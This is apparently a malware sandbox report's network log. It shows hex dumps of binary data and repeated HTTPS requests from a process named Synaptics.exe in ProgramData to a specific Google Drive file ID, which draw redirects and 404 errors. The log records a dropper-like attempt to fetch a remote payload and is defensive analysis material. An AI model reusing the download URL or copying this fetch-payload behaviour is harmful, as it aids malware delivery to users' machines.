                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 66 81 78 04 b1 d7 75 1d 8b 50 0c 3b 50 10 73 15 03 50 14 66 f7 40 06 01 00 74 19 8a 0a 80 f9 1a 75 12 b0 01 c3 50 e8 d1 00 00 00 5a 80 fc 1a 74 f1 ff 4a 0c 31 c0 c3 90 53 56 8b d8 83 ce ff 66 8b 43 04 66 3d b0 d7 76 29 66 3d b3 d7 77 23 6a 00 8b 03 50 e8 b3 df ff ff 8b f0 83 fe ff 75 07 e8 5f f6 ff ff eb 15 8b c6 33 d2 f7 73 08 8b f0 eb 0a b8 67 00 00 00 e8 38 f6 ff ff 8b
                                                                                                                                                                Data Ascii: 8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[fxuP;PsPf@tuPZtJ1SVfCf=v)f=w#jPu_3sg8
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 08 04 39 5f 5b c3 8b c0 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 8a 2a 42 08 28 40 fe c9 75 f6 c3 90 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de c9 c1 e8 05 74 79 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de c9 c1 e8 04 74 61 8d 04 80 db ac 43 bf 39 40 00 de c9 eb 53 f7 d8 3d 00 14 00 00 7d 46 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de f9 c1 e8 05 74 34 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de f9 c1 e8 04 74 1c 8d 04 80 db ac 43 bf 39 40 00 de f9 eb 0e dd d8 db ab e9 37 40 00 eb 04 dd d8 d9 ee 5b c3 00 00 00 00 00 00 00 80 ff 7f 00 00 00 00 00 00 00 80 ff 3f 00 00 00 00 00 00 00 a0 02 40 00 00 00 00 00 00 00 c8
                                                                                                                                                                Data Ascii: 9_[VW_^@*B(@uS1|M=S7@tytS)9@taC9@S=}FS7@t4tS)9@tC9@7@[?@
                                                                                                                                                                2024-12-25 08:07:01 UTC1378INData Raw: 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 28 29 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 24 3d 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb 17 8d 4d f8 8b 53 18 8b c7 e8 72 ff ff ff 8b 55 f8 8b c6 e8 bc 28 00 00 83 3e 00 0f 95 c3 33 c0 5a 59 59 64 89 10 68 2b 3d 40 00 8d 45 f8 e8 89 28 00 00 c3 e9 17 06 00 00 eb f0 8b c3 5f 5e 5b 59 59 5d c3 53 56 89 c3 8b 43 b8 85 c0 74 29 8b 08 83 c0 04 8b 32 3b 30 75 18 8b 72 04 3b 70 04 75 10 8b 72 08 3b 70 08 75 08 8b 72 0c 3b 70 0c 74 13 83 c0 1c 49 75 dc 8b 5b dc 85 db 74 04 8b 1b
                                                                                                                                                                Data Ascii: sr!()@USVW3]U3Uh$=@d0d 3Uct1Ct>>t!PPMSrU(>3ZYYdh+=@E(_^[YY]SVCt)2;0ur;pur;pur;ptIu[t


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49741 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:25 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-ZVncMeoAbmqzRnkETno54w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:25 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-HGbHfaxYR4GZlRTEUCfWRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49755 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:29 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-gbtB9KR535hDf8DJ7TBMuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49754 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:29 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'report-sample' 'nonce-KRL4-2Mqnc1jfDm2NeBQRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                5 | 192.168.2.4 | 49766 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:07:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:33 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gGgoPzxTzUJTwEkePH_oSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                6 | 192.168.2.4 | 49767 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:07:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:33 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-PXq3L3VJNaPaAegPUcRo4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                7 | 192.168.2.4 | 49774 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:07:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DFN3HbwV1YdvEdrbVMZ-uA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                8 | 192.168.2.4 | 49773 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:07:35 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-25 08:07:36 UTC | 1601 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4tfXR_jvBnoOmFWo_EU3txcxA31dCHxmsa1rvlDiKUk8nfIji9ctnaujoLm4XQ9GiJfsnXZGo
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-hsfk9xJEsLeQ7fTnu1KYYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Set-Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:07:36 UTC | 1601 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZnNRXMYBjh9Naz01kDe1qA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                2024-12-25 08:07:36 UTC | 51 | IN | Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                9 | 192.168.2.4 | 49772 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:07:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:07:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VX7U5pZz3f6x4oyY7RVnWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49771 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:35 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
2024-12-25 08:07:36 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5R9-y2K9Uc1YS28zKzMIjlr5Lsk_SnmicSaIKNBWItdEzvlSkHylIzxn0DZlD-UGVd
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:36 GMT
                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-WWK9c0otsDCsIZGODaTMgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Set-Cookie: NID=520=ES8n9cVyCUaunsy6BkYMzsBr24OjOb2KaLrMudzmiicf0zrQxE7a90KFSHonEK3bSfV4GkrhxYVtjQGHgZpQD4LoCKwcaYfpmdNTbAY0-4dqash3ELo436BN2GnWNTjm6pHSD-Mlclev7P-9DqeLvx7P6YWB2_TZmM2MFJL-yCfjy7fWQQmGVhc; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:07:36 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wWBq5PPnjImK-kJQor_DXw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-25 08:07:36 UTC | 58 | IN | Data Ascii: nd on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49784 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
